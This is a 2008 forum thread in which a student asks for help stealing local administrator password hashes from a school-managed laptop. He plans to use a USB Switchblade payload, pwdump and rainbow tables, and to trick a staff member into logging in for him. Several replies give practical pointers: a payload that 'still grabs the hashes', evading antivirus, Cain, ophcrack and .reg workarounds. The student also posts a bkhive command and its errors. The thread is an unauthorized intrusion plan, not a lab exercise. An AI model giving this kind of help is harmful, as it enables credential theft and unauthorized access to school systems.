felony_destined Posted January 4, 2008 Share Posted January 4, 2008 So, I'm first going to give the scenario here and hope that I'm not flamed as I have read many posts looking for asnwers before desperately just posting my own and this isnt exactly the most pleasant place to get help, but what tech board is? so with out further prolongment my situation is as follows. . . . . . in school one of my teachers lets us watch movies pretty much ALL THE TIME, remotely educational ones I might add, only we have to watch them on a television. At first, one might think so whats abnormal about that, well nothing except the fact that in the classroom is a school imaged laptop with a lovely projector, basically WE WANNA WATCH OUR MOVIES ON THE BIG SCREEN! :shock: The next you might be wondering is, how on earth is this related to lm hashes? well here we go, now the scenario aswell as the attack are more than easy to understand in theory First some background information: Now, this year is alittle bit different then my previous ones at this school, I was actually on the schools help desk if you will, and therefore trusted with the admin password to all the computers, unfortunately that program was taken out of the school so no more students with admin privs. This presents a problem because I cant do all the things I used to be spoiled with. Now, not to stray too far away from my actual goal. . . to be able to watch movies on the lappy in the classroom. I noticed in the years before that we were unable to watch movies even on computers with DVD-ROMS, didnt take me long to figure out that well these banged up XP wanna-be images on the computers have the DVD ROMS disabled in the local policy, so what do I do? I just enable them again in the local policy editor. . . DUH! one problem with that = you need to be logged as administrator sooooooo. . . with some research including articles, tutorials, videos, and alittle self experience I've concluded that the most effective way to achieve knowledge of a local users password is using rainbow tables to find a lm hashs' plain-text. now, my first approach was to use backtrack and pwdump BUT. . . the boot sequence on the machines is HD 1st and the BIOS is password protected, now if I was really desperate yes of course I could pull the jumper but I mean what are the chances of me opening up a computer in the middle of class and not getting erm. . . disciplined for it? so, the next thing that caught my eye was that nifty little "USB Switchblade" hack I must say its brilliant. I actually have downloaded and ran it off my thumbdrive with success on a dummy target, now I understand that you need admin privelages to even get the hashes, but seeing as almost the entire school alumni knows me well as being computer knowledgable, I'm sure getting a staff member to log in as administrator FOR me while I secretly take the hashes wont be much of a task with my cunning and social engineering prone personality. so heres the problem, I watched the hak. 5 episode when this exploit is shown but with the package that I downloaded, and as a matter of fact I've tried all of them I get useless (well not exactly useless, but not significant to my dilema) information, for example saved browser passwords etc. all of that stuff is just lovely and was well noted for perhaps a later exploit but all I want is some lm hashes to the local users of the system so I'm asking this as humbly as I know how in hopes that it is recognized and returned back in the following posts, anyone got the switchblade package with a utility that DOES grab lm hashes that I can download. I tried making my own batchfile which is alittle less stealth but hardly suspicious to the idiots running my school however I'm not very successful getting pwdump to work either =[ Thank you in advance, A troubled teen :???: Quote Link to comment Share on other sites More sharing options...
felony_destined Posted January 4, 2008 Author Share Posted January 4, 2008 okay, so I mentioned in the last post that I didnt have the best luck with pwdump when I look in the logfile, this is what I get from SAM dump Logon to 127.0.0.1ADMIN$ failed: code 53 maybe I do have the right package installed on my drive perhaps theres just some type of parameter missing or incorrectly typed in the bat file? I'm unsure and not to sound impatient I'm getting a bit frustrated as I already promised the teacher that I WOULD get this DVD player to work since i already knew what the problem was from previous experience, I just cant do anything about it without admin privs :-x Quote Link to comment Share on other sites More sharing options...
DLSS Posted January 5, 2008 Share Posted January 5, 2008 hmm well, i dont kno what the problem is ... my old non-u3 payload still grabs the hashes etc without giving me errors as long as the person is logged in as admin. (you can check if its still up on the wiki , i just hope u can still get it past the virus scan) but also in your last post you say'd I already promised the teacher that I WOULD get this DVD player to work by that i presume you have your teachers permission , so couldn't you just go get the head of IT (or whoevever does that kinda thing there) to turn it on, log in, and make it play ? anyway if all else fails you could try and boot a version of linux off a stick & play the dvd useing vlc ... (if it'll boot off the stick ..) Quote Link to comment Share on other sites More sharing options...
felony_destined Posted January 5, 2008 Author Share Posted January 5, 2008 thanx for that, I mean the laptop is a pretty new model and I'm sure the BIOS supports booting USB however, I dont know the proper procedure on booting a linux iso from your thumbdrive and even if I did... I would still need access to the BIOS to change the boot sequence, wouldn't I? and some of the movies... no most of the movies we watch in class the principal wouldnt exactly agree with I'm more than certain of that, so I can't exactly just get immediate clearance from anyone who knows the password to help me out but if I did I would still like to have the password for future troubleshooting that requires admin privs so basically the ultimate solver of my problems would be a successful run of pwdump/fgdump which I have not tried to run on my switchblade yet, that will be my next trial however I'm unsure why pwdump wont work though Quote Link to comment Share on other sites More sharing options...
moonlit Posted January 5, 2008 Share Posted January 5, 2008 Unplug the projector and plug in your own laptop? Quote Link to comment Share on other sites More sharing options...
felony_destined Posted January 5, 2008 Author Share Posted January 5, 2008 Brilliant, my personal laptop however isnt stepping foot in that school if it grew legs and even still it doesn't have a DVD player on it ...regretting not kicking out the extra $100 for the next model up lol Quote Link to comment Share on other sites More sharing options...
Jigsaw Posted January 5, 2008 Share Posted January 5, 2008 Hmm... theres no video/audio output on the DVD player to the projector? I feel that this problem could be a achieved without the immediate stealing of admin password. But I do understand that future use of admin pass would be useful. Quote Link to comment Share on other sites More sharing options...
felony_destined Posted January 5, 2008 Author Share Posted January 5, 2008 actually, there might be... I didnt look but the DVD player aswell as the TV are drilled to the cieling and I'm not sure if we even had a video/audio cord to extend that long, thanks for your help aswell though both of those are valid ideas aswell as 'almost' effective implements much appreciated =] Quote Link to comment Share on other sites More sharing options...
digip Posted January 7, 2008 Share Posted January 7, 2008 Is the laptop part of a domain? If so, then arent the hashes stored as NTLM hashes (not LM hashes) on some other server for authentication, which means it should have some backup copy on the local machine if it can not reach the domain to authenticate? (I am just guessing here, but not sure) I have never tried to rip a hash other than my own machine which is fairly easy with something like Cain or ophcrack, but then again you need to be able to boot from CD for ophcrack and without the bios, you can't choose this. Cain will(or should) set off any virus scanners upon use, so that will be a problem as well. The other option is to find the exact registry key that controls what you want and just add the key to the registry to enable/disable the settings.(this should even be possible without admin access, but I do not see that they would disable registry access from reg files. We disable access to Regedit on out lan, but you can still manually patch settings with .reg files which kind of defeats the purpose of disabling access to regedit.) Either way, your at school. You get caught, its on you. Be carefull whatever you decide to do. Quote Link to comment Share on other sites More sharing options...
moonlit Posted January 7, 2008 Share Posted January 7, 2008 I still think breaking in to the network is a little extreme for something that is really nothing to do with cracking... Quote Link to comment Share on other sites More sharing options...
felony_destined Posted January 7, 2008 Author Share Posted January 7, 2008 lol... well, it is part of a domain somewhat, every student/teacher has been asigned individual usernames&passwords to authenticate EACH user, where as before we would all sign is as username student or teacher or administrator... when logging in there is a drop down menu that allows you to select where you would like to login (This Computer, or the BCPS Domain(Baltimore County public schools)) if you choose to login to 'the computer' administrator will work, I know this only from prior experince, however logging in with a personal authentication it would authenticate from huge server, idk how big exactly but when I looked at how much free space I had available on my BCPS drive it was 500GB and every user is like that, but I'm thinking it might be shared? because 500GB * # of students in BCPS = very expensive & pointless =/ Quote Link to comment Share on other sites More sharing options...
felony_destined Posted January 8, 2008 Author Share Posted January 8, 2008 when I run bkhive /mnt/sda1/windows/sys32/config/sysem key I get boot key:some random hex thing error writing to key is this because the file is set to read-only or something? I'm not sure how or why that attribute might be set aswell as being put into effect since I didn't boot from windows I was on backtrack. or is there another reason why I might be getting that error? thoughts appreciated Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.